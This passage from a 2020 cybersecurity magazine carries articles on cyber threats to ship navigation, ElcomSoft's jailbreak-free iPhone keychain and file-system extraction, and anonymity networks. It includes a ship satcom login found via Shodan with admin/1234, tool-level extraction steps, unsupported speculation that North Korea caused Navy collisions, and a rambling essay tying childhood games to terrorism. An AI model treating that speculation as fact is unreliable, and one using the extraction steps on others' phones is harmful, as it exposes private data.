and started the Six-Day War. Indeed, the Strait is the only way to leave the Gulf of Aqaba and gain access<br />
to Iran’s oil. Other important passages such as the Bab El-Mandab Strait, the Danish Straits, or the<br />
Bosporus are well-known narrow gullies.<br />
Canals are equally critical for international trade, especially the Suez and the Panama ones. The former<br />
was the theater of a war in 1956 between Egypt and a French, British and Israeli alliance (encompassed<br />
in the secretive Protocol of Sèvres) to regain control after being nationalized by the infamous Egyptian<br />
President Nasser. The latter, under U.S. control for almost 100 years, was retroceded to Panama and<br />
recently enlarged to accommodate the new bigger ships and ensure revenue to Panama as it represents<br />
5.5 % of its GDP.<br />
The Art of Hacking Navigation Systems<br />
In 2017, some incidents at sea have sparked interrogations as hundreds of South Korean fishing vessels<br />
returned earlier to port after their GPS (Global Positioning System) signals were jammed, allegedly by<br />
3<br />
HUGHES Lindsay. “String of Pearls Redux: Increased Concern for India”, Future Directions International, Nov 13, 2018<br />
http://www.futuredirections.org.au/publication/string-of-pearls-redux-increased-concern-for-india/<br />
4<br />
U.S. Energy Information Administration (EIA). “How much petroleum the United States import and export?”, EIA, Apr 4, 2017<br />
https://www.eia.gov/tools/faqs/faq.php?id=727&t=6<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 86<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
North Korean hackers.5 Later this year, a ship in the Black Sea reported to the U.S. Coast Guard<br />
Navigation Center that its GPS system had been disrupted and that over 20 ships in the same area had<br />
been similarly affected.6 In Asian waters, deadly collisions happened twice in two months; In June 2017,<br />
the USS Fitzgerald was struck by a container ship off the coast of Japan, killing 7 sailors. Later during<br />
the year, an oil tanker smashed the USS John S. McCain near Malaysian coast and 10 sailors died.7<br />
There were also two other lesser-known incidents in 2017: in January, the USS Antietam ran aground<br />
near its base in Japan and in May the USS Lake Champlain collided with a South Korean fishing vessel.8<br />
Consequently, Vice Admiral Joseph Aucoin was relieved of his duty as commander of the U.S. 7th Fleet,<br />
the largest forward-deployed U.S. fleet based in Japan and covering Asia.9<br />
The causes of all these incidents are not clear. Some experts blame the weather, the heavily reliance on<br />
technology, the feeble signal of GPS, cyberattacks, the diminution of crew members or the high pace of<br />
deployment lacking training and maintenance. Regarding the number of incidents in a less-than-one-year<br />
period and the highly disputed regions where incidents happened (South East Asia and East Asia), the<br />
theory of a deliberated influence on navigation systems through cyberattacks is legitimate, especially<br />
when the navigation system used is analyzed.<br />
Ships orientate themselves through Global Navigation Satellite System (GNSS) with many countries<br />
using their own: GPS for the U.S., GLONASS for Russia, GALILEO for the E.U., QZSS for Japan, BeiDou<br />
for China, and NAVIC for India. Although precise to a few meters, this technology is not highly secure<br />
because the message is feeble and can be hacked. The same year of these incidents, a security<br />
researcher based in France was able to enter the satellite communications system of a ship: Through<br />
Shodan, a specific search engine that can reveal connected devices, and by entering a simple username<br />
(admin) and password (1234), he accessed the communication center of a commercial ship and posted<br />
his performance on Twitter: “I’m connected to a mother****ing ship as admin right now. Hacking ships is<br />
easy”.10<br />
New Alternatives<br />
To prevent this over-dependency on GNSS for Positioning, Navigation and Timing (PNT), some states<br />
are developing alternatives that rely on radio frequency, an old technology used since WWII. One of<br />
5<br />
SAUL Jonathan. “<strong>Cyber</strong> threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017<br />
https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT<br />
6<br />
Ibid.<br />
7<br />
FIFIELD Anna. “Bodies of all 10 sailors missing on USS John S. McCain have been recovered”, The Washington Post, Aug 27, 2017<br />
https://www.washingtonpost.com/world/bodies-of-all-10-sailors-missing-on-uss-john-s-mccain-have-been-recovered/2017/08/27/a2af6c4a-8b8c-11e7-<br />
a2b0-e68cbf0b1f19_story.html<br />
8<br />
BARANIUK Chris. “Why it’s not surprising that ship collisions still happen”, BBC, Aug 22, 2017<br />
http://www.bbc.com/future/story/20170822-why-its-not-surprising-that-ship-collisions-still-happen<br />
9<br />
AFP. “U.S. Warship Collisions Raise <strong>Cyber</strong>attack Fears”, Security Week, Aug 23, 2017<br />
http://www.securityweek.com/us-warship-collisions-raise-cyberattack-fears<br />
10<br />
CHAMBERS Sam. “Ship’s satellite communication system hacked with ease”, Splash 24/7, Jul 19, 2017<br />
http://splash247.com/ships-satellite-communication-system-hacked-ease/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 87<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
these systems is called eLoran (Enhanced LOnge-RAnge Navigation) and although it is less accurate,<br />
regional, and only two-dimensional, it offers a powerful signal that deters jamming or spoofing.11 The<br />
cost and the political inertia thwarted this technology, but this is likely to change given these events.<br />
South Korea is currently testing this technology and Russia is developing its own eLoran named<br />
eChayka.12 In the U.S., the Director of National Intelligence told a Senate committee that the global<br />
threat of electronic warfare attacks against space systems would rise in coming years and the U.S. Navy<br />
launched a Hack-Our-Ship event to assess cyber threats at sea, such as hacking a complex system<br />
software system simulating the ones used to control the U.S. Navy fleets.13,14<br />
Military and Economic Implications<br />
In network-centric warfare, the military relies on information gathering to Observe, Orient, Decide, Act<br />
(the OODA loop) and GNSS are part of the tools to collect it. In the battlefield, it is the capacity to make<br />
the right decision as quickly as possible, and most specifically quicker than your enemy, that makes the<br />
difference between victory/life or defeat/death. Therefore, an army relying too much on one technology<br />
could be “blinded” during a conflict and unable to allocate forces efficiently.<br />
Following 19th Century American Navy Strategist Alfred T. Mahan, the U.S. developed a great power<br />
projection capability after WWII that enables it to rapidly deploy military means to defend any interest<br />
whether political, economic, military or humanitarian. Power projection is a mix of hard and soft power,<br />
depending on the situation. This approach is materialized by aircraft carriers and the separation of fleets<br />
allocated to specific regions of the globe (7 for the U.S. Navy).<br />
Aircraft carriers are not travelling the sea alone and an entire structure of ships and submarines escort<br />
them, known as a carrier strike group (CSG), with a total crew of more than 7,500.15 The total acquisition<br />
cost of a CSG exceeds $25 billion, an air wing (the aircrafts on the aircraft carrier) another $10 billion and<br />
estimated annual operating costs are around $1 billion.16 Currently, the U.S. has 10 Nimitz-class nuclearpowered<br />
supercarriers. Therefore, a major cyberattack on navigation systems, for example, could<br />
paralyze an entire CSG and considerably diminish the U.S. ability to maneuver.<br />
On the economic side, the world’s largest container ship and supply vessel company, Moller-Maersk,<br />
suffered from the wiper malware attack named NotPetya and the company reported a loss between USD<br />
11<br />
SAUL Jonathan. “<strong>Cyber</strong> threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017<br />
https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT<br />
12<br />
DUNN John E. “<strong>Cyber</strong>attacks on GPS leave ships sailing in dangerous waters”, Naked Security, Aug 7, 2017<br />
https://nakedsecurity.sophos.com/2017/08/07/cyberattacks-on-gps-leave-ships-sailing-in-dangerous-waters/<br />
13<br />
SAUL Jonathan. “<strong>Cyber</strong> threats prompt return of radio for ship navigation”, Reuters, Aug 7, 2017<br />
https://in.reuters.com/article/us-shipping-gps-cyber-idINKBN1AN0HT<br />
14<br />
OWENS Katherine. “Navy conducts ‘Hack-Our-Ship’ cybersecurity event”, <strong>Defense</strong> Systems, Mar 13, 2017<br />
https://defensesystems.com/articles/2017/03/13/hacknavy.aspx<br />
15<br />
WISE David W. “The U.S. Navy’s Big Mistake – Building Tons of Supercarriers”, War Is Boring, Dec 25, 2016<br />
https://warisboring.com/the-u-s-navys-big-mistake-building-tons-of-supercarriers/<br />
16<br />
Ibid.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 88<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
200-300 million for Q3 2017.17 More specifically, navigation systems such as the Electronic Chart<br />
Display (ECDIS) are very vulnerable and have also been hit with different attacks being reported in Asia.<br />
According to the maritime technical lead at cyber security firm NCC Group, "Ecdis systems pretty much<br />
never have anti-virus".18<br />
Pyongyang Hackers are Smart<br />
Both of the military vessels involved in collisions, the USS Fitzgerald and the USS John S. McCain, are<br />
guided missile destroyers equipped with the Aegis Ballistic Missile <strong>Defense</strong> System (BMDS), which is a<br />
system allowing the interception of an ICBM (Intercontinental Ballistic Missile), the ones that are currently<br />
being tested by North Korea and usually equipped with one or multiple nuclear warheads. An ICBM has<br />
four phases: boost, post-boost/ascent, midcourse and terminal (reentry in the atmosphere). The Aegis<br />
BMDS aims at destroying an ICBM during the post-boost/ascent phase (before the missile leaves earth’s<br />
atmosphere).<br />
The Lazarus hacking group, famous for the Sony breach in 2014 and allegedly linked to North Korea,<br />
targets individuals associated with U.S. defense contractors with the same tools and tactics of the Sony<br />
breach. This time, the phishing emails display fake job listings and companies’ internal policies.19 Some<br />
jobs listed were for the US (Terminal High Altitude Area <strong>Defense</strong>) THAAD system, which is a BMDS and<br />
intercept an ICBM in its terminal phase (after the missile re-enters in the atmosphere).<br />
Therefore, if the four U.S. Navy collisions in Asian waters are due to a cyberattack, the explanation could<br />
be that the North Korean government is attempting to infiltrate the U.S. military system to be able to<br />
collect information on the full spectrum of BMDS and, at best, disrupt the defense systems against its<br />
ICBM. On the diplomatic side, it could be a strong message sent to the US and its Asian allies assuring<br />
them that Pyongyang has serious capabilities and that it would be better to negotiate with it than escalate<br />
tensions.<br />
This strategy is part of a general trend in APT (Advanced Persistent Threats), long-term targeted specific<br />
cyberattacks mixing a combination of social engineering, cyberweapons, and vectors to get inside<br />
networks, instead of hacking directly the big fish such as the Department of <strong>Defense</strong> or a big player in<br />
weapons (Aegis, Boeing, Lockheed Martin, etc.), hackers will target a third party working for these targets.<br />
Indeed, their cybersecurity posture will be lower than a critical administration or company with<br />
technologies and processes in places regarding cyberdefense, and with aware employees towards<br />
phishing campaigns.<br />
17<br />
MIMOSO Michael. “MAERSK Shipping Reports $300M Loss Stemming from NotPetya Attack”, Threatpost, Aug 16, 2017<br />
https://threatpost.com/maersk-shipping-reports-300m-loss-stemming-from-notpetya-attack/127477/<br />
18<br />
BARANIUK Chris. “How hackers are targeting the shipping industry”, BBC, Aug 18, 2017<br />
http://www.bbc.com/news/technology-40685821<br />
19<br />
BARTH Bradley. “Lazarus Group tied to new phishing campaign targeting defense industry workers”, SC Media, Aug 14, 2017<br />
https://www.scmagazine.com/lazarus-group-tied-to-new-phishing-campaign-targeting-defense-industry-workers/article/681701/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 89<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Future Tensions at Sea<br />
Among many strategic hotspots, the most sensitive ones are currently the Indian Ocean, the South and<br />
East China Seas, and, for the foreseeable future, the Artic.<br />
The Indian Ocean is now a space of geopolitical criticality from a maritime perspective, especially now<br />
that the U.S. wants to improve its relations with New Delhi to counterbalance Beijing’s aspirations in the<br />
context of the BRI (Belt and Road Initiative). China is determined to change the status quo in this region<br />
and is investing in ports (i.e. the String of Pearls) to control the flow of merchandise along sea lines from<br />
China to the Middle East and Africa.<br />
Indeed, these sea lines through the Indian Ocean are vital for China’s oil imports, as about 40% comes<br />
through the Strait of Hormuz and over 80% through the Malacca Strait.20 Thus, the rationale of shifting<br />
from a land-based armed force to a sea-based one is to defend these interests at sea and protect China<br />
as a regional hegemon. Hence, the people’s liberation army is building aircraft carriers, submarines,<br />
patrol vessels, and has put in place an A2/AD (Anti Access/Area Denial) tactic with investments on shorebased<br />
anti-ship missiles. Ultimately, China wants to push the U.S. behind its second island chains (at the<br />
east side of the Philippine Sea).<br />
As pointed out by The Economist, the Asia Pacific is the trade region of the future: Eight out of the world’s<br />
ten busiest container ports are there. Two-thirds of the world’s oil shipments travel across the Indian<br />
Ocean. Almost 30% of maritime trade goes across the South China Sea; it accounts for over 10% of<br />
world fisheries production and is thought to have oil and natural-gas deposits beneath its seabed.21<br />
Another strategic hotspot will emerge northward: the Arctic. Within decades, the ice melting phenomenon<br />
will open shipping lanes, allowing vessels like Russia’s first ice class LNG (Liquefied Natural Gas) tanker<br />
to travel through the region. It will also increase disputes for the access to resources and to preserve its<br />
fragile ecosystem.22<br />
Like in Rudyard Kipling’s novel “Kim” where he made popular the great game at stake between the British<br />
and Russian empires to control Central Asia in the 19th Century, the new great game is now between<br />
the US and China for the control of all Asia. This rivalry will encompass the use and leverage of sea<br />
power as naval strategist Alfred T. Mahan put in perspective in “The Influence of Sea Power Upon History”<br />
as national prosperity and power depend on the control of world's sea-lanes, thus: "Whoever rules the<br />
waves rules the world".23<br />
20<br />
The Economist. “Who rules the waves?”, The Economist, Oct 17, 2015<br />
https://www.economist.com/news/international/21674648-china-no-longer-accepts-america-should-be-asia-pacifics-dominant-naval-power-who-rules<br />
21<br />
The Economist. “Who rules the waves?”, The Economist, Oct 17, 2015<br />
https://www.economist.com/news/international/21674648-china-no-longer-accepts-america-should-be-asia-pacifics-dominant-naval-power-who-rules<br />
22<br />
Author interviews. “‘Stavridis’ Book ‘Sea Power’ Explains Why Oceans Matter in Global Politics”, NPR, Jun 6, 2017<br />
http://www.npr.org/2017/06/06/531701056/stavridis-book-sea-power-explains-why-oceans-matter-in-global-politics<br />
23<br />
MAHAN Alfred Thayer, “The Influence of Sea Power upon History: 1660-1783” Little, Brown and Company, Boston, 1890<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 90<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
Julien Chesaux is a <strong>Cyber</strong> Security Consultant at Kudelski Security, a<br />
Swiss and American cyber security company. Julien mainly works on<br />
cyber security, information security and geopolitics analysis in order to<br />
help clients to find solutions regarding their threats. He is also a speaker<br />
and writer for different think tanks, journals and events. He has worked in<br />
diplomacy and cyber security for 10 years in Switzerland, Australia, the<br />
Balkans and France. His main research interests are Global Security,<br />
<strong>Cyber</strong> Geopolitics, and International Affairs.<br />
LinkedIn profile: www.linkedin.com/in/julien-chesaux-65279456<br />
You can reach me at julien.chesaux@gmail.com<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 91<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Iphone Extraction Without A Jailbreak<br />
Imaging the file system and decrypting the keychain from iOS devices without jailbreaking<br />
By Oleg Afonin, Security Researcher, ElcomSoft Co.Ltd.<br />
Traditionally, forensic experts without access to proprietary technologies had relied upon jailbreaks to<br />
perform the lowest-level extraction of Apple iOS devices. Using jailbreaks, even advanced ones exploiting<br />
hardware vulnerabilities, presents a number of challenges. In this article, we are offering an alternative<br />
method for accessing the content of iOS devices that does not require jailbreaking.<br />
Jailbreak-based acquisition<br />
Before covering jailbreak-free extraction, let’s talk about jailbreaks.<br />
Why is a jailbreak needed during the course of file system extraction? Jailbreaking the device allows<br />
experts to raise privileges to the level required to access the protected file system on the device, which<br />
is simply not possible on Apple devices without superuser access. In addition, a jailbreak was the only<br />
way to extract and decrypt the complete content of the keychain containing all of the user’s saved<br />
password and things such as certificates, identities and encryption keys (e.g. keys to encrypted<br />
databases of third-party password managers). In other words, a jailbreak was (and still is) used to obtain<br />
the required level of privileges for accessing things such as application sandboxes, stored passwords<br />
and encryption keys.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 92<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Why not just keep using a jailbreak?<br />
If jailbreaks are such a great thing, why don’t we keep using them for low-level extractions? The thing is,<br />
jailbreaks bring their share of problems. First and most importantly, public jailbreaks were never meant<br />
for mobile forensics. Installing a jailbreak unnecessarily modifies the system partition (making the postacquisition<br />
future of the device iffy). Since public jailbreaks are designed to allow running unsigned code<br />
(such as the various apps downloaded from third-party app stores), they do a lot more (and a lot deeper)<br />
modifications to the system than would be necessary for the purpose of forensic acquisition.<br />
Finding the right jailbreak and installing it properly may also become a challenge if you are not<br />
accustomed to this sort of things. For these and other reasons, jailbreaking may not be an option for<br />
some experts. This is where jailbreak-free acquisition comes to help.<br />
How jailbreak-free acquisition works<br />
In the previous chapter, I wrote that one needs low-level access to the file system in order to perform the<br />
extraction, and this still stands even if you are not going to use a jailbreak. We developed a different<br />
method for obtaining the required level of privileges on a wide range of iOS devices. Explaining the<br />
essence of the method brings us back to jailbreaking.<br />
Essentially, a jailbreak exploits several vulnerabilities discovered in a given version of iOS or a range of<br />
versions of iOS. The vulnerabilities are exploited consecutively one after another, which makes it a chain<br />
of vulnerabilities to exploit. A jailbreak requires a number of different exploits to escape sandbox, obtain<br />
superuser access and disable various protections iOS has in place to prevent this sort of things. Finally,<br />
a jailbreak opens read/write access to the system partition and patches several files in order to disable<br />
signature verification, which allows installing apps missing Apple approval from third-party app stores.<br />
While this is a grand oversimplification, you get the idea: a jailbreak does a lot of things that aren’t<br />
necessary for just extracting the file system and obtaining the keychain.<br />
A given jailbreak can be installed on a given version of iOS (or a range of versions of iOS). Different<br />
jailbreaks are required to break into the different versions of the system since different exploits are<br />
required. Our method automatically detects the installed version of iOS and applies exactly those exploits<br />
that are minimally required to obtain access to the file system. To do that, one must sign and install the<br />
‘agent’ app to the device, and then use that agent to extract the file system and decrypt the keychain.<br />
Unlike jailbreaks, the agent performs all modifications in the device’s volatile memory (RAM) without<br />
writing any unnecessary stuff into persistent storage. The agent does not even touch the system partition,<br />
leaving the post-acquisition device perfectly usable and updatable.<br />
Why choose jailbreak-free extraction over jailbreaks<br />
There are numerous advantages of agent-based extraction over jailbreaks.<br />
1. Jailbreak-free extraction is safe. The agent does not touch the system partition, leaving the device<br />
in a clean state after the acquisition.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 93<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
2. Clean and forensically sound. The agent does not write any unnecessary stuff onto the data<br />
partition, and does not leave any traces behind sans a few records in the system log.<br />
3. Much easier to handle. Most jailbreaks (except checkra1n, which uses a hardware exploit) are<br />
limited to a narrow range of iOS versions. The agent has all the exploits required to gain access<br />
to the data, and automatically applies the right exploit for a given version of iOS.<br />
4. Robust operation. Jailbreaks are wonky to install, (very) frequently failing without an obvious<br />
reason and no path forward. We are yet to see a single case where the agent would fail on a<br />
supported platform.<br />
5. Offline operation. The agent can and should be installed with the device being in Airplane mode.<br />
An Internet connection on the iPhone is never required, making it a safe, risk-free extraction.<br />
Agent-based extraction also has two major drawbacks.<br />
1. You will absolutely need a Developer account with Apple to sign and install the agent. A Developer<br />
account with Apple costs money (around $100/year if you use a personal one).<br />
2. The agent is available for a wide but still limited range of iOS versions, currently supporting iOS<br />
10.0 through iOS 13.4.1 inclusive. Extracting an iPhone running a newer iOS build would be only<br />
possible if we discover the corresponding exploit. Alternatively, the checkra1n jailbreak may be<br />
available if the device is an iPhone 8, 8 Plus or iPhone X or older.<br />
How to use jailbreak-free extraction<br />
Jailbreak-free extraction is available through Elcomsoft iOS Forensic Toolkit. You will also need an Apple<br />
ID enrolled in Apple’s Developer Program, and have an app-specific password created in your profile.<br />
Write down that password, you’ll need it to sign the extraction agent. The acquisition steps are:<br />
1. Connect the iPhone to your computer. Approve pairing request (you may have to enter the<br />
passcode on the device to do that).<br />
2. Launch Elcomsoft iOS Forensic Toolkit. The main menu will appear.<br />
3. We strongly recommend performing logical acquisition first (by creating the backup, extracting<br />
media files etc.)<br />
4. For agent-based extraction, you’ll be using numeric commands.<br />
5. Press 1 to install the agent onto the iPhone. Enter the Apple ID and the app-specific password<br />
you’ve created in the developer profile, then type the ‘Team ID’ related to your developer account.<br />
6. The agent is installed on the device. Tap on the Agent icon on the iPhone to launch it, and keep<br />
it in the foreground during the extraction.<br />
7. Press 2 to extract and decrypt the keychain (you can view it in Elcomsoft Phone Viewer).<br />
8. Press 3 to capture the file system image. The tool uses the TAR format to save the file system<br />
image. You can view it with Elcomsoft Phone Viewer or third-party forensic tools.<br />
9. Press 4 to clean-up and uninstall the agent from the iPhone.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 94<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Conclusion<br />
Jailbreak-free acquisition has numerous advantages over jailbreaks, and only two drawbacks. If your iOS<br />
device falls in the supported range of iOS 10.0 through 13.4.1, we strongly recommend sticking with the<br />
new, jailbreak-free acquisition method. If the iPhone you are analyzing is based on an unsupported<br />
platform, a compatible jailbreak may still be an option.<br />
About the Author<br />
Oleg Afonin is ElcomSoft’s security researcher and mobile forensic<br />
specialist. He is a frequent speaker at industry-known conferences<br />
such as CEIC, HTCIA, FT-Day, Techno Forensics and others. Oleg<br />
co-authored multiple publications on IT security and mobile<br />
forensics. With years of experience in digital forensics and security<br />
domain, Oleg led forensic training courses for law enforcement<br />
departments in multiple countries.<br />
Oleg can be reached online at (o.afonin@elcomsoft.com, https://twitter.com/elcomsoft or<br />
https://t.me/elcomsoft) and at our company website www.elcomsoft.com<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 95<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How to Maintain Anonymity in Communications?<br />
By Milica D. Djekic<br />
The kids would love to play the games. They would not be attracted with the computer’s games only, but<br />
rather with some being so creative, engaging and imagination needing. As they do so they would imagine<br />
that they are some fictional characters and the entire play would get some deep meaning to them. That’s<br />
how the children would build up their personalities, psychology and minds. When they grow up some of<br />
those habits would remain with them. Maybe they would not express those sides of their personalities<br />
then, but they would cope with the clear memories and subconscious drives about those occurrences.<br />
We would never know what can trigger some kind of the behavior with the adult people as long as we<br />
are not familiar with their childhood and personal development. Some kids would enjoy playing the social<br />
games developing their social intelligence and skill, while the others would choose the world of loneliness<br />
doing some reading, writing or drawing. The both cases could give the amazing creativity to the<br />
prospective adults and in our opinion – it’s important to find the balance between the social and<br />
introspection’s skills. When the parents are rising their kids they should know that the best practice in<br />
such a case could be to let their offspring become what they want to be, but some kind of supervision<br />
and advising is necessary in order to define the borders that the youth can expect in their lives and social<br />
connections. The well-applied measure of forming someone’s character is through the model of<br />
rewarding and punishing and the proper family education must take that sort of teaching into account.<br />
One of the favorite games to many kids is making the call and talking to someone through the tissue. In<br />
such a game, they would make a voice and get completely unrecognizable as they would use some<br />
covering to speak through so. They would usually do so in the company for getting some fun and joking<br />
the people on the line. Basically, everything would start as so innocent kids’ game and literally the stuffs<br />
are under control as long as that behavior is just the way of playing. Also, there would be some children<br />
that would make their voice being unrecognizable doing some misrepresentation and make the fully<br />
fictional story about anything. Someone would say that their imagination could lead them so far away,<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 96<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
ut the case is if such a behavior is not restricted at its beginning it can cause the serious troubles the<br />
later on if that person does not quit with such habits. In other words, those individuals could continue<br />
playing “no one would see me” game and get the real concern to their surroundings. Any security<br />
professional would recognize it’s all about someone who would cope with the deep need to hide his<br />
identity and those habits could get adopted early in the childhood. So, in order to prevent the new<br />
generation of weird adults it’s needed to follow the progress of the children not only through schooling,<br />
but rather via the social activities. So, if the strict questions with the psychology’s interview are made and<br />
if anyone is reporting about such a strange behavior some measures of teaching should get applied.<br />
Practically, the next step in such a development could be that such individuals could figure out that the<br />
phone line with the changed voice is not that interesting toy any longer, so some kind of the transmission<br />
into the cyberspace could work better.<br />
The fact is the computer with the internet connectivity could provide us a plenty of opportunities to remain<br />
hidden behind some profile or account. In addition, there are the entire anonymity solutions being<br />
developed that can serve to stay anonymous and still in position to share your story or content with many.<br />
Indeed, these sorts of the systems could get used for the security purposes when needed to protect your<br />
identity and exchange some vitally important information. So, the phone with the tissue on is for the kids<br />
– the real hackers would rely on so sophisticated cyber infrastructure. From such a point of view, it’s only<br />
the business and many would do that for the money, but there are still so many unhealthy minds that<br />
would choose their victims in order to do bullying or provide the fake news to the communities. The main<br />
concern with the Darknet anonymity systems is that they would be the role-based ones and they would<br />
use the quite strong encryption, so if on the inaccessible spots there would be some difficulties to confirm<br />
the identity of the information sharer. We would say the places that are not easily approachable for a<br />
reason we would get in mind the terrorist groups that would take advantage over such well-developed<br />
systems and send the disinformation wherever they can. In other words, the innocent kid’s game could<br />
lead to the serious security concern, so from this perspective – the Pandora box would get opened as<br />
there would appear so many questions pointing the motives of the heavy cases to commit so harsh<br />
crimes.<br />
Even the kid can get how significant can be to appear as the trusted person and they can try to imitate<br />
the voice of the adult people in order to trick or confuse someone. The similar situation is with the Darknet<br />
asset as so many its users would recognize the power of the trusted account or at least convincing<br />
someone that they are the trusted persons. If anyone accepts that he is talking to the trusted individual<br />
he can give the information he normally would not and the bad guys could use such a campaign to collect<br />
the intelligence and figure out something they would never do. The timing and accurate information can<br />
mean the victory in the war, so it’s from the strategic significance to adopt the measures and techniques<br />
in order to prevent, observe and respond to such and similar cases in the practice.<br />
Who is from another Side of Cord?<br />
Doing some anonymity operations the bad guys would go through some experience believing something<br />
so important is happening on. Possibly they would develop those needs in the childhood and they would<br />
cope with the very vivid inner experiences that would motivate them to proceed with such an activity.<br />
Their motto could be that no one would even get who is on another side of the cord, so from their point<br />
of view it may appear as quite exciting and interesting doing so. The aim of the terrorism is to spread the<br />
fear and panics amongst the community members, so that’s why someone with the vivid imagination<br />
would make so horrifying stories that would get used to intimidate the quite broad population. Probably<br />
that special effect suggesting that – I know you, but you do not know me! – would deeply motivate the<br />
bad guys to believe they have some sort of the power over other people’s lives and security. It’s quite<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 97<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
dangerous playing those games in the adulthood, so what’s so needed is to understand the motives of<br />
the persons doing so for a reason once the motive is defined the crime would stop.<br />
Why Does Identity Matter?<br />
It’s not only about the terrorist and criminal organizations to hide their identity – so many defense<br />
professionals would choose to carefully manage their identity as the way of security and privacy<br />
measures getting applied on their tasks. In other words, it’s not smart at all going around and sharing all<br />
you know with everyone as that could be the huge threat to someone’s life and business. So, the wellknown<br />
Deep Web solutions are designed by the defense communities, but at the moment they are<br />
available to anyone for more or less obvious reasons. The identity matters in any case and once the<br />
people are convinced that some account is trusted they can try to share a lot of findings with such a<br />
profile. The modern history would teach us how life can be hard and why it’s important to take some<br />
measures of protection.<br />
The Deep Web systems could get used by the media staffs in order to bring the story to the audience.<br />
Practically, anyone sitting on the comp and writing to the journalist could get approved as the information<br />
source to some media group for a reason he can offer the content frequently. So, that’s how the public<br />
opinion could get created and managed and in our belief – that’s so dangerous weapon that can<br />
compromise the media professionalism. No ethical media house would trust to anyone and before<br />
anything is published there should be the several levels of the confirmation. In other words, anyone<br />
looking for the exclusives on the Tor should know that he is possibly working for the other side of the law.<br />
The Need to Hide Who You Are<br />
Sometimes the intelligence sources reporting to some defense agency would need to hide their identity<br />
for the security needs. The agent on the other side of the communications would deal with the clear<br />
picture in a term who is talking to him. Also, the security organizations can confirm a lot of that, so it’s<br />
quite clear they would be highly confident about the sources of the information. Being the source of the<br />
findings to anyone creditable is so heavy and time consuming task and it needs the reliability, accuracy<br />
and skill in order to get approved for such a service. Apparently, the defense staff would hide who he is<br />
as well because it’s not necessary to know any sort of the personal details of that guy as the task is to<br />
provide so helpful findings to the agency. How such an effort would get further directed it’s not up to the<br />
informant – it’s only up to that defense team.<br />
The Anonymity Information Exchange Systems<br />
The most known privacy infrastructure worldwide is the Tor anonymity system that would cope with the<br />
millions of users every single day. From time to time that service would get shut down, but it’s more about<br />
such network’s configuration rules. Essentially, the Tor service can offer the good privacy and it’s mainly<br />
reliable to its users. It would cope with the multi-level encryption, so it’s quite trickery to anyone to<br />
challenge its security capacities. Let’s say the Tor is the quite trusted system that would attract so many<br />
professionals from many areas of interest. Apparently, it would cope with its dark side being one of the<br />
biggest Darknet service providers in the world. It would get the real oasis to the criminals, terrorists and<br />
hackers as it would offer a lot of benefits to the users seeking to remain safe.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> –<strong>July</strong> <strong>2020</strong> <strong>Edition</strong> 98<br />
Copyright © <strong>2020</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How Bad Guys Could Take Advantage of So<br />
Maintaining the anonymous communications could be the real challenge and so many people across the<br />
globe would cope with such a fact. Especially, the bad guys would know how to take advantage over<br />
such an infrastructure as they would choose to stay invisible once the authorities come to get them. Some<br />
of their tactics would show they would deal with so many security and privacy accounts and for such a<br />
reason it can be difficult tracking what they really do. Indeed, there are the ways to figure out something,<br />
but the majority of their activities would stay well-camouflaged to the investigators and intelligence officers<br />
